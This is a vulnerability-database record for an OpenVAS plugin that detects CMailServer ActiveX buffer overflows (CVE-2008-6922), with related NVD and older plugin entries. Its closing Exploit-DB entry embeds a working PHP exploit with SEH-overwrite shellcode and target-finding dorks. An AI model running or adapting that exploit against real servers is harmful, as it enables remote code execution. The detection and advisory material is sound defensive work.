CMailServer ActiveX Control Multiple Buffer Overflow Vulnerabilities
2009-08-20T00:00:00
ID OPENVAS:1361412562310900918 Type openvas Reporter Copyright (C) 2009 SecPod Modified 2018-11-30T00:00:00
Description
This host is installed with CMailServer ActiveX Control and is
prone to Multiple Buffer Overflow vulnerabilities.
###############################################################################
# OpenVAS Vulnerability Test
# $Id: secpod_cmailserver_activex_mult_bof_vuln.nasl 12608 2018-11-30 17:27:57Z cfischer $
#
# CMailServer ActiveX Control Multiple Buffer Overflow Vulnerabilities
#
# Authors:
# Nikita MR <rnikita@secpod.com>
#
# Copyright:
# Copyright (c) 2009 SecPod, http://www.secpod.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
# Registration block: evaluated when the scanner loads the plugin. The exit(0)
# at its end keeps the detection logic further down from running in this mode.
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.900918");
script_version("$Revision: 12608 $");
script_tag(name:"last_modification", value:"$Date: 2018-11-30 18:27:57 +0100 (Fri, 30 Nov 2018) $");
script_tag(name:"creation_date", value:"2009-08-20 09:27:17 +0200 (Thu, 20 Aug 2009)");
script_tag(name:"cvss_base", value:"9.3");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:C/I:C/A:C");
# CVE-2008-6922 / BID 30098: stack-based buffer overflows in CMailCOM.dll,
# reachable through the POP3 and SMTP class ActiveX controls.
script_cve_id("CVE-2008-6922");
script_bugtraq_id(30098);
script_name("CMailServer ActiveX Control Multiple Buffer Overflow Vulnerabilities");
script_xref(name:"URL", value:"http://secunia.com/advisories/30940");
script_xref(name:"URL", value:"http://www.milw0rm.com/exploits/6012");
script_xref(name:"URL", value:"http://xforce.iss.net/xforce/xfdb/43594");
# QoD: the verdict rests on the file version of CMailCOM.dll read over SMB,
# not on an active probe of the web interface.
script_tag(name:"qod_type", value:"executable_version");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (C) 2009 SecPod");
script_family("SMTP problems");
# The product version key (CMailServer/Ver) is populated by the detect script;
# SMB (139/445) is needed to read the registry and the DLL version.
script_dependencies("smb_reg_service_pack.nasl", "secpod_cmailserver_detect.nasl");
script_require_ports(139, 445);
script_mandatory_keys("CMailServer/Ver");
script_tag(name:"impact", value:"This issue can be exploited by sending a specially crafted POST
request to mvmail.asp with an overly long 'indexOfMail' parameter to execute
arbitrary code on the affected system.");
script_tag(name:"affected", value:"CMailServer version 5.4.6 and prior.");
script_tag(name:"insight", value:"A boundary error occurs in CMailServer POP3 Class ActiveX
control (CMailCOM.dll) while handling arguments passed to the 'MoveToFolder()'
method.");
script_tag(name:"summary", value:"This host is installed with CMailServer ActiveX Control and is
prone to Multiple Buffer Overflow vulnerabilities.");
# No vendor fix exists. The earlier revision of this check (OPENVAS:900918)
# also named setting the killbit for the vulnerable CLSIDs (KB240797) as a
# workaround; that is exactly what the detection logic below tests for.
script_tag(name:"solution", value:"No known solution was made available for at least one year since the disclosure
of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer
release, disable respective features, remove the product or replace the product by another one.");
script_tag(name:"solution_type", value:"WillNotFix");
exit(0);
}
include("smb_nt.inc");
include("version_func.inc");
include("secpod_activex.inc");
include("secpod_smb_func.inc");
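# Detection logic. Only Windows targets are relevant: both the install path and
# the DLL version are read from the target over SMB.
if(!get_kb_item("SMB/WindowsVersion")){
  exit(0);
}

# Product version as recorded by secpod_cmailserver_detect.nasl (a dependency).
cmailVer = get_kb_item("CMailServer/Ver");
if(isnull(cmailVer)){
  exit(0);
}

# Affected: CMailServer 5.4.6 and prior.
if(version_is_less_equal(version:cmailVer, test_version:"5.4.6"))
{
  # Install directory from the product's uninstall key.
  dllPath = registry_get_sz(key:"SOFTWARE\Microsoft\Windows\CurrentVersion"+
                            "\Uninstall\CMailServer_is1", item:"InstallLocation");
  if(isnull(dllPath)){
    exit(0);
  }

  # Split "X:\dir" into the administrative share ("X$") and the share-relative
  # path of the vulnerable COM server.
  share = ereg_replace(pattern:"([A-Z]):.*",replace:"\1$", string:dllPath);
  file = ereg_replace(pattern:"[A-Z]:(.*)",replace:"\1", string:dllPath +
                      "\CMailCOM.dll");

  # File version of CMailCOM.dll. Bail out when nothing could be read
  # (presumably NULL when the file is missing or unreadable over SMB — confirm
  # against secpod_smb_func.inc); previously an empty value fell straight into
  # the version compare below.
  dllVer = GetVer(share:share, file:file);
  if(isnull(dllVer)){
    exit(0);
  }

  # check if CMailCOM.dll version is 1.0.0.1 or prior
  if(version_is_less_equal(version:dllVer, test_version:"1.0.0.1"))
  {
    # The vendor never shipped a fix; the effective mitigation is the killbit
    # on both vulnerable CLSIDs (POP3 class and SMTP class). Report unless
    # both are set.
    if((is_killbit_set(clsid:"{6971D9B8-B53E-4C25-A414-76199768A592}") == 0) ||
       (is_killbit_set(clsid:"{0609792F-AB56-4CB6-8909-19CDF72CB2A0}") == 0)){
      security_message(port:0);
    }
  }
}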
{"id": "OPENVAS:1361412562310900918", "type": "openvas", "bulletinFamily": "scanner", "title": "CMailServer ActiveX Control Multiple Buffer Overflow Vulnerabilities", "description": "This host is installed with CMailServer ActiveX Control and is\nprone to Multiple Buffer Overflow vulnerabilities.", "published": "2009-08-20T00:00:00", "modified": "2018-11-30T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900918", "reporter": "Copyright (C) 2009 SecPod", "references": ["http://xforce.iss.net/xforce/xfdb/43594", "http://secunia.com/advisories/30940", "http://www.milw0rm.com/exploits/6012"], "cvelist": ["CVE-2008-6922"], "lastseen": "2019-05-29T18:40:20", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-6922"]}, {"type": "exploitdb", "idList": ["EDB-ID:6012"]}, {"type": "openvas", "idList": ["OPENVAS:900918"]}], "modified": "2019-05-29T18:40:20", "rev": 2}, "score": {"value": 9.3, "vector": "NONE", "modified": "2019-05-29T18:40:20", "rev": 2}, "vulnersScore": 9.3}, "pluginID": "1361412562310900918", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_cmailserver_activex_mult_bof_vuln.nasl 12608 2018-11-30 17:27:57Z cfischer $\n#\n# CMailServer ActiveX Control Multiple Buffer Overflow Vulnerabilities\n#\n# Authors:\n# Nikita MR <rnikita@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900918\");\n script_version(\"$Revision: 12608 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-30 18:27:57 +0100 (Fri, 30 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-08-20 09:27:17 +0200 (Thu, 20 Aug 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2008-6922\");\n script_bugtraq_id(30098);\n script_name(\"CMailServer ActiveX Control Multiple Buffer Overflow Vulnerabilities\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/30940\");\n script_xref(name:\"URL\", value:\"http://www.milw0rm.com/exploits/6012\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/43594\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"SMTP problems\");\n script_dependencies(\"smb_reg_service_pack.nasl\", \"secpod_cmailserver_detect.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"CMailServer/Ver\");\n script_tag(name:\"impact\", value:\"This issue can be exploited by sending a specially crafted POST\nrequest to mvmail.asp with an overly long 'indexOfMail' parameter to execute\narbitrary code on the affected system.\");\n script_tag(name:\"affected\", value:\"CMailServer version 5.4.6 and prior.\");\n script_tag(name:\"insight\", value:\"A boundary error occurs in CMailServer POP3 Class ActiveX\ncontrol (CMailCOM.dll) while handling arguments passed to 
the 'MoveToFolder()'\nmethod.\");\n script_tag(name:\"summary\", value:\"This host is installed with CMailServer ActiveX Control and is\nprone to Multiple Buffer Overflow vulnerabilities.\");\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_activex.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(!get_kb_item(\"SMB/WindowsVersion\")){\n exit(0);\n}\n\ncmailVer = get_kb_item(\"CMailServer/Ver\");\nif(isnull(cmailVer)){\n exit(0);\n}\n\nif(version_is_less_equal(version:cmailVer, test_version:\"5.4.6\"))\n{\n dllPath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\"+\n \"\\Uninstall\\CMailServer_is1\", item:\"InstallLocation\");\n if(isnull(dllPath)){\n exit(0);\n }\n share = ereg_replace(pattern:\"([A-Z]):.*\",replace:\"\\1$\", string:dllPath);\n file = ereg_replace(pattern:\"[A-Z]:(.*)\",replace:\"\\1\", string:dllPath +\n \"\\CMailCOM.dll\");\n dllVer = GetVer(share:share, file:file);\n if(version_is_less_equal(version:dllVer, test_version:\"1.0.0.1\"))\n {\n if((is_killbit_set(clsid:\"{6971D9B8-B53E-4C25-A414-76199768A592}\") == 0) ||\n (is_killbit_set(clsid:\"{0609792F-AB56-4CB6-8909-19CDF72CB2A0}\") == 0)){\n security_message(port:0);\n }\n }\n}\n", "naslFamily": "SMTP problems"}
{"cve": [{"lastseen": "2021-02-02T05:35:21", "description": "Multiple stack-based buffer overflows in CMailCOM.dll in CMailServer 5.4.6 allow remote attackers to execute arbitrary code via a long argument to the (1) CreateUserPath, (2) Logout, (3) DeleteMailByUID, (4) MoveToInbox, (5) MoveToFolder, (6) DeleteMailEx, (7) GetMailDataEx, (8) SetReplySign, (9) SetForwardSign, and (10) SetReadSign methods, which are not properly handled by (a) the POP3 Class ActiveX control (CMailCom.POP3); or a long argument to the (11) AddAttach, (12) SetSubject, (13) SetBcc, (14) SetBody, (15) SetCc, (16) SetFrom, (17) SetTo, and (18) SetFromUID methods, which are not properly handled by the Class ActiveX control (CMailCOM.SMTP), as demonstrated via the indexOfMail parameter to mwmail.asp.", "edition": 4, "cvss3": {}, "published": "2009-08-10T18:30:00", "title": "CVE-2008-6922", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-6922"], "modified": "2017-09-29T01:33:00", "cpe": ["cpe:/a:youngzsoft:cmailserver:5.4.6"], "id": "CVE-2008-6922", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-6922", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:youngzsoft:cmailserver:5.4.6:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-10-30T10:55:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-6922"], "description": "This host is installed with CMailServer ActiveX Control and is\nprone to Multiple Buffer Overflow vulnerabilities.", 
"modified": "2017-10-26T00:00:00", "published": "2009-08-20T00:00:00", "id": "OPENVAS:900918", "href": "http://plugins.openvas.org/nasl.php?oid=900918", "type": "openvas", "title": "CMailServer ActiveX Control Multiple Buffer Overflow Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_cmailserver_activex_mult_bof_vuln.nasl 3898 2009-08-19 12:45:380Z aug \n#\n# CMailServer ActiveX Control Multiple Buffer Overflow Vulnerabilities\n#\n# Authors:\n# Nikita MR <rnikita@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_solution = \"No solution or patch was made available for at least one year\nsince disclosure of this vulnerability. 
Likely none will be provided anymore.\nGeneral solution options are to upgrade to a newer release, disable respective\nfeatures, remove the product or replace the product by another one.\n\nA workaround is to set the Killbit for the vulnerable CLSID\nhttp://support.microsoft.com/kb/240797\";\n\ntag_impact = \"This issue can be exploited by sending a specially crafted POST\nrequest to mvmail.asp with an overly long 'indexOfMail' parameter to execute\narbitrary code on the affected system.\";\n\ntag_affected = \"CMailServer version 5.4.6 and prior.\";\n\ntag_insight = \"A boundary error occurs in CMailServer POP3 Class ActiveX\ncontrol (CMailCOM.dll) while handling arguments passed to the 'MoveToFolder()'\nmethod.\";\n\ntag_summary = \"This host is installed with CMailServer ActiveX Control and is\nprone to Multiple Buffer Overflow vulnerabilities.\";\n\nif(description)\n{\n script_id(900918);\n script_version(\"$Revision: 7573 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-10-26 11:18:50 +0200 (Thu, 26 Oct 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-08-20 09:27:17 +0200 (Thu, 20 Aug 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2008-6922\");\n script_bugtraq_id(30098);\n script_name(\"CMailServer ActiveX Control Multiple Buffer Overflow Vulnerabilities\");\n\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/30940\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/6012\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/43594\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"SMTP problems\");\n script_dependencies(\"secpod_reg_enum.nasl\", \"secpod_cmailserver_detect.nasl\");\n script_mandatory_keys(\"CMailServer/Ver\");\n 
script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_activex.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(!get_kb_item(\"SMB/WindowsVersion\")){\n exit(0);\n}\n\ncmailVer = get_kb_item(\"CMailServer/Ver\");\nif(isnull(cmailVer)){\n exit(0);\n}\n\nif(version_is_less_equal(version:cmailVer, test_version:\"5.4.6\"))\n{\n dllPath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\"+\n \"\\Uninstall\\CMailServer_is1\", item:\"InstallLocation\");\n if(isnull(dllPath)){\n exit(0);\n }\n share = ereg_replace(pattern:\"([A-Z]):.*\",replace:\"\\1$\", string:dllPath);\n file = ereg_replace(pattern:\"[A-Z]:(.*)\",replace:\"\\1\", string:dllPath +\n \"\\CMailCOM.dll\");\n dllVer = GetVer(share:share, file:file);\n # check if CMailCOM.dll version is 1.0.0.1 or prior\n if(version_is_less_equal(version:dllVer, test_version:\"1.0.0.1\"))\n {\n # Check if the Killbits are set\n if((is_killbit_set(clsid:\"{6971D9B8-B53E-4C25-A414-76199768A592}\") == 0) ||\n (is_killbit_set(clsid:\"{0609792F-AB56-4CB6-8909-19CDF72CB2A0}\") == 0)){\n security_message(port:0);\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-01T00:01:47", "description": "CMailServer 5.4.6 (CMailCOM.dll) Remote SEH Overwrite Exploit. CVE-2008-6922. 
Remote exploit for windows platform", "published": "2008-07-06T00:00:00", "type": "exploitdb", "title": "CMailServer 5.4.6 CMailCOM.dll Remote SEH Overwrite Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-6922"], "modified": "2008-07-06T00:00:00", "id": "EDB-ID:6012", "href": "https://www.exploit-db.com/exploits/6012/", "sourceData": "<?php\n /*\n CMailServer 5.4.6 mvmail.asp/CMailCOM.dll remote seh overwrite\n\tproof of concept exploit\n\n by Nine:Situations:Group::bruiser\n\n our site: http://retrogod.altervista.org/\n\n software site: http://www.youngzsoft.net/cmailserver/\n\n Google dorks:\n intitle:\"Mail Server CMailServer WebMail\"\n intitle:\"Mail Server CMailServer WebMail 5.4.6\"\n\n Some notes:\n This server provides a IIS/webmail interface and a registered component\n\tvulnerable to multiple buffer overflows, among the others, the\n\tCMailCom.POP3 class with CLSID 6971D9B8-B53E-4C25-A414-76199768A592.\n This class is called by various ASP scripts inside the main folder...\n\tI found this clear vector, look mwmail.asp , lines 25-35:\n\n ...\n\t Set objPOP3 = CreateObject(\"CMailCOM.POP3.1\")\n objPOP3.Login Session(\"User\"), Session(\"Pass\")\n Session(\"LoginSuccess\") = objPOP3.LoginSuccess\n If Session(\"LoginSuccess\") = 1 Then\n\t set rs=Server.createobject(\"adodb.recordset\")\n \t rs.open \"mailfolder\",Conn,1,3\n\t i = 0\n\t arrString = Split(Request(\"indexOfMail\"), \";\", -1, 1)\n\t While Len(arrString(i)) <> 0\n\t strUID = arrString(i)\n\t objPOP3.MoveToFolder strUID ' <---------------- bof\n\t ...\n\n\tBy attaching olly to the w3wp.exe sub-process you will see the usual\n\tdump with ecx and eip owned, with a buffer of approxymately 13000 chars.\n\n Exploitation is post-auth but you can have a user account by simply\n\tbrowsing the signup.asp page, enabled by default.\n Calc.exe will run with NETWORK SERVICE privilege, check tasks. 
Note\n\tthat 4-5 failed exploit attempts may result in IIS \"Service\n\tUnavailiable\" message.\n\n Other attacks are possible, see a list of locally overflowable\n methods:\n CreateUserPath, Logout, DeleteMailByUID, MoveToInbox, MoveToFolder,\n\tDeleteMailEx, GetMailDataEx, SetReplySign, SetForwardSign, SetReadSign.\n\tNote also that remotely there's some kind of validation (ex. you can\n\tnot have a username with a length of more than 4000 chars which\n\tcould be used instead to overflow the CreateUserPath method and\n\tyou cannot overflow ex. through the strUID argument) which reduces a lot\n\tthe remote vectors. However, as you can see there's no filter on\n\t\"indexOfMail\" one.\n\n Other notes:\n CMailCOM.SMTP class with CLSID 0609792F-AB56-4CB6-8909-19CDF72CB2A0\n\tis also vulnerable in the following methods:\n AddAttach, SetSubject, SetBcc, SetBody, SetCc, SetFrom,\n SetTo, SetFromUID\n */\n\n error_reporting(7);$host=$argv[1];$path=$argv[2];\n $argv[3] ? $port = (int) $argv[3] : $port = 80;\n print (\"CMailServer 5.4.6 mvmail.asp/CMailCOM.dll remote seh overwrite\\n\".\n \"exploit\\n\".\n \"by Nine:Situations:Group::bookoo\\n\");\n $argv[2] ? print(\"attackin'...\\n\") : die (\"syntax: php \".$argv[0].\" [host] [path] [[port]]\\n\".\n\t \"example: php \".$argv[0].\" 192.168.0.1 /mail/ \\n\".\n\t \" '' php \".$argv[0].\" 192.168.0.1 / 81 \\n\");\n $url = \"http://$host:$port\";\n $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;\n $win ? 
dl(\"php_curl.dll\") : dl(\"php_curl.so\");\n\n //borrowed from bookoo\n function send($packet,$out) {\n\n global $url, $data;\n\n\t if (!extension_loaded(\"curl\"){\n\t\t die(\"you need the curl extesion loaded to run...\");\n }\n\t $ch = curl_init();\n curl_setopt($ch, CURLOPT_URL,$url);\n curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\n curl_setopt($ch, CURLOPT_TIMEOUT, 5);\n curl_setopt($ch, CURLOPT_HEADER, 1);\n curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $packet);\n $data = curl_exec($ch); if (curl_errno($ch)) {\n print curl_error($ch).\"\\n\";\n } else {\n curl_close($ch);\n }\n if ($out) print($data.\"\\n\");\n }\n\n $agent=\"Mozilla/5.0 (Windows; U; Windows NT 5.2; it; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15\";\n //subscribe\n $usr=\"bookoo\";$pwd=\"password\";//new usr username & password, change\n\t$d =\"Signup=1&Account=$usr&Pass=$pwd&RePass=$pwd&UserName=&Comment=User&POP3Mail=%40ieqowieoqw.com\";\n $h =\"POST \".$path.\"signup.asp HTTP/1.0\\r\\nHost: $host\\r\\nUser-Agent: $agent\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\nContent-Length: \".strlen($d).\"\\r\\nConnection: Close\\r\\n\\r\\n$d\";\n\tsend($h,0);\n\t$tmp=explode(\"Set-Cookie: \",$data);\n\tfor ($i=1; $i<count($tmp);$i++){ $tmpi=explode(\" \",$tmp[$i]);$sess=$tmpi[0];$pos=strpos($sess, \"ASPSESSIONID\");\tif ($pos === true) break; echo $sess.\"\\n\";}\n\t//login\n\t$d =\"User=$usr&Pass=$pwd&SaveUserPass=on\";\n $h =\"POST \".$path.\"login.asp HTTP/1.0\\r\\nHost: $host\\r\\nUser-Agent: $agent\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\nContent-Length: \".strlen($d).\"\\r\\nCookie: $sess SaveUserPass=1; Pass=$pwd; User=$usr;\\r\\nConnection: Close\\r\\n\\r\\n$d\";\n \tsend($h,0);\n \t//attack\n //bad chars: \\x3b \\x2f\n # win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=Pex http://metasploit.com\n $shellcode =\n \"\\x2b\\xc9\\x83\\xe9\\xde\\xe8\\xff\\xff\\xff\\xff\\xc0\\x5e\\x81\\x76\\x0e\\xcf\".\n 
\"\\x67\\x5f\\x11\\x83\\xee\\xfc\\xe2\\xf4\\x33\\x8f\\x1b\\x11\\xcf\\x67\\xd4\\x54\".\n \"\\xf3\\xec\\x23\\x14\\xb7\\x66\\xb0\\x9a\\x80\\x7f\\xd4\\x4e\\xef\\x66\\xb4\\x58\".\n \"\\x44\\x53\\xd4\\x10\\x21\\x56\\x9f\\x88\\x63\\xe3\\x9f\\x65\\xc8\\xa6\\x95\\x1c\".\n \"\\xce\\xa5\\xb4\\xe5\\xf4\\x33\\x7b\\x15\\xba\\x82\\xd4\\x4e\\xeb\\x66\\xb4\\x77\".\n \"\\x44\\x6b\\x14\\x9a\\x90\\x7b\\x5e\\xfa\\x44\\x7b\\xd4\\x10\\x24\\xee\\x03\\x35\".\n \"\\xcb\\xa4\\x6e\\xd1\\xab\\xec\\x1f\\x21\\x4a\\xa7\\x27\\x1d\\x44\\x27\\x53\\x9a\".\n \"\\xbf\\x7b\\xf2\\x9a\\xa7\\x6f\\xb4\\x18\\x44\\xe7\\xef\\x11\\xcf\\x67\\xd4\\x79\".\n \"\\xf3\\x38\\x6e\\xe7\\xaf\\x31\\xd6\\xe9\\x4c\\xa7\\x24\\x41\\xa7\\x97\\xd5\\x15\".\n \"\\x90\\x0f\\xc7\\xef\\x45\\x69\\x08\\xee\\x28\\x04\\x3e\\x7d\\xac\\x67\\x5f\\x11\";\n $jmp_short=\"\\xeb\\x10\\x90\\x90\";\n\t$seh=\"\\xf1\\xda\\x02\\x10\"; #0x1002DAF1 cmailcom.dll / pop ecx - pop - ret\n $nop=str_repeat(\"\\x90\",12648);\n\t$bof= $nop . $jmp_short. $seh . str_repeat(\"\\x90\",24). $shellcode ;\n\t$d=\"sel=aaaa&ToFolder=4&indexOfMail=\".urlencode($bof).\"&mailcount=1&pages=\";\n $h =\"POST \".$path.\"mvmail.asp HTTP/1.0\\r\\nHost: $host\\r\\nUser-Agent: $agent\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\nContent-Length: \".strlen($d).\"\\r\\nCookie: $sess SaveUserPass=1; Pass=$pwd; User=$usr;\\r\\nConnection: Close\\r\\n\\r\\n$d\";\n send($h,1);\n?>\n\n# milw0rm.com [2008-07-06]\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/6012/"}]}